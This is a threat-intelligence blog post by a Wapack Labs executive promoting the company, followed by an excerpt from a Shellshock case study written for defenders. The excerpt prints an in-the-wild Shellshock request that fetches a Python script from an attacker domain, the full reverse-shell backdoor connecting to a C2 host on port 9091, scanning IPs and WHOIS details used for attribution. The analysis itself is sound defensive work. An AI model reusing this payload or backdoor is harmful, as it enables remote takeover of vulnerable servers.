At least three times every week I get asked by someone "What's the difference between Wapack Labs and Red Sky Alliance?" "Who is your target customer?" "What product do we deliver?" "What's your distribution look like?"
So let's start here...
Wapack Labs is an intelligence, research and analysis company. We sell information.
- Wapack Labs authors sources and sells intelligence, research and analysis. We deliver it in many forms, to many places... Red Sky Alliance/Beadwindow, the FS-ISAC, Subscriptions, OEM, Threat Recon, etc. We publish in PDF, STIX, HTML, CSV, and JSON.
Red Sky Alliance is a crowdsourcing platform for cyber threat intelligence pro's. Discussions are deep, and at the end of the thread, they receive a finished report with analysis of the discussion.
- Security researchers go to Red Sky Alliance to share notes, build the story, and together, protect their networks. What happens in Red Sky Alliance, stays in Red Sky Alliance. It's private. There's no government involvement. We don't care how you interact with DSS, the regulators, or any other government organization --that's your choice. Red Sky Alliance exists to help improve your security. The private portal is ALWAYS busy. We've added university users, and just this week, another Icelandic bank.
- For government security researchers we offer a second collaborative... Beadwindow --delivered in Threat Connect. They do not get access to the Red Sky private portal, but they do get information that they may care about. We've delivered cyber warnings, dumped credential caches and targeting, to several government agencies directly, and for others, we push stuff through Beadwindow to contacts at the 24th AF and the US MDA. None of the US Cyber Centers participate, so if you're a state, local or .gov who needs help, call us. We can help. And our stuff is UNCLASSIFIED! You can actually use it!
As an example of one of our reports, I've posted (below) a snippet from a Wapack Labs report to Red Sky Alliance members and Wapack Labs subscribers...
We published this report in it's entirety last week.
We took a bit of a different approach on what seemed to be the hottest topic of the last two weeks - Shellshock. (Need information on Shellshock? Try here.)
We're looking for use cases where we might help protect against. This is one of three case studies that we'd identified, taking advantage of Shellshock.
You'll see quickly that it's written for technically focused defenders. If you're a SOC analyst, incident responder, or intrusion analyst, this is for you. We have others for managers and the C-Suite, but this report is lower level. We show all of our work and sources. When done, it's gets published as a PDF in whole, and (if sourced by Wapack Labs) farmed for Threat Recon.
So if you're a techie, enjoy. If you're a manager, ask your techie what it means ;)
You'll see quickly that it's written for technically focused defenders. If you're a SOC analyst, incident responder, or intrusion analyst, this is for you. We have others for managers and the C-Suite, but this report is lower level. We show all of our work and sources. When done, it's gets published as a PDF in whole, and (if sourced by Wapack Labs) farmed for Threat Recon.
So if you're a techie, enjoy. If you're a manager, ask your techie what it means ;)
SHELLSHOCK CASE STUDY AND
INFRASTRUCTURE
Beginning on 24 September 2014,
hackers and researchers began exploiting the widely publicized Shellshock bash
vulnerability, described in CVE -2014-6271.
The majority of the initial activity involved mass vulnerability
scanning by white hats and black hats alike. Examination of scanning activity
showed a peak on September 27th with a sharp decline as of September29th .
This spike and sudden decrease may be a result of what is likely wide-scale
patching of the vulnerability. Alternatively, this may mark the end of
exploiting the vulnerability for reconnaissance purposes and could signal a
move up the kill-chain into more targeted operations.
Legacy
Scamming infrastructure re-emerges with Shellshock
A recently observed instance of Shellshock in the
wild took the form of a Python implemented backdoor hosted on google-traffic-analytics.com. Table 5 lists the observed originating IPs along with the Shellshock request:
Originating
IPs
|
Shellshock Request
|
14.163.12.119
77.29.189.34
78.15.20.81
78.161.195.166
79.136.130.110
88.253.229.151
93.139.212.67
109.227.100.189
112.156.18.40
113.171.116.163
117.218.186.16
118.172.123.111
119.130.114.154
124.123.75.68
178.120.175.81
178.121.79.68
190.49.241.220
190.82.114.190
223.206.54.26
|
() { :;}; /bin/bash -c '/usr/bin/env curl -s
http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x
/tm
|
!/usr/bin/env
python
from
socket import *
import
os
from
time import sleep
import
sys
fpid =
os.fork()
if
fpid!=0:
host='stats.google-traffic-analytics.com'
port=9091
sockobj = None
############################################
sockobj = None
recv = False
def connect():
try:
sockobj=socket(AF_INET,SOCK_STREAM)
sockobj.connect((host,port))
return sockobj
except:
return False
while True:
while not sockobj:
sockobj = connect()
print "[*] Trying to
reconnect..."
sleep(1)
if sockobj:
recv = sockobj.recv(1024)
#print recv
if not recv: sockobj = False; break;
cmd = recv.strip()
res = os.popen(cmd).read()
if res:
sockobj.sendall(res)
|
Legacy Whois Record
|
Current Record
|
Registrant
Contact:
Goga Gastoyan
Goga Gastoyan Goga Gastoyan
bash@blogbuddy.ru
+7.4957452002 fax: +7.4957452002
Pokryshkina d.36 kv.36
Moscow Moscow 119602
ru
|
Admin
Name: Radovanka Janekovic
Admin
Organization: Goga Gastoyan
Admin
Street: Ljubljanska 6
Admin
City: Bled
Admin
State/Province: Bled
Admin
Postal Code: 4260
Admin
Country: SI
Admin
Phone: +386.15765749
Admin
Phone Ext:
Admin
Fax: +386.15765749
Admin
Fax Ext:
Admin
Email: support@google-traffic-analytics.com
|
Table
5. google-traffic-analytics.com Scanning Nodes
Upon successful exploitation, a CURL request is made for http://google-traffic-analytics.com/cl.py. The Python script (cl.py) is a simple yet
effective Backdoor that works on both Linux and Windows. It also has a zero
detection on Virus Total [1].
The configured C2 address is hosted on subdomain stats.google-traffic-analytics.com. The downloaded python script will attempt
connection C2 on port 9091 and if the C2 is listening - a shell is opened up to the victim.
During testing, a the C2 node issued a uname –a command which prints all
available information about a Linux system [2]. [Comment: No additional activity was observed.] (See Mitigations section for a SNORT signature)
The
re-emergence of this domain after an apparent four year hiatus begs the
question of whether it belongs to the same attackers. A Whois history report
from Domain Tools lists the registrant during 2010 as “Goga Gastoyan”, (bash@blogbuddy.ru),
however this changed in 2013 to the current owner “Radovanka Janekovic”. Further inspection of
the records revealed Goga Gastoyan as the Admin organization in the new record – thus confirming likely
attribution to the same attackers. With
the connection made to the legacy infrastructure, one could assume that this latest activity involving Shellshock could be the most recent
attempt to expand the spamming network.
Table
6. Whois Record Comparison
[1]
https://www.virustotal.com/en/file/052421011162421c7fbe1c9613e37b520a494034901dab1c6ee192466090421d/analysis/
[2]
http://linux.about.com/library/cmd/blcmdl1_uname.htm
[3] http://blog.sucuri.net/2010/08/more-spam-google-traffic-analytics-com-cc-server.html
------------------------------------------------------
I realize this is pretty technical, but I thought it important to offer a simple slice of some of the work we do. This report is the basis for nearly everything else. These reports, when complete are farmed for placement in Threat Recon. This information, sourced by the lab, is thought to be high confidence (although we never score anything perfect!).
This week is again, crazy. I'm on the podium at 9:00 at the FS-ISAC conference, and we've got a heck of a topic. I'm looking forward to seeing you all there.
Have a great weekend!
Jeff
This week is again, crazy. I'm on the podium at 9:00 at the FS-ISAC conference, and we've got a heck of a topic. I'm looking forward to seeing you all there.
Have a great weekend!
Jeff
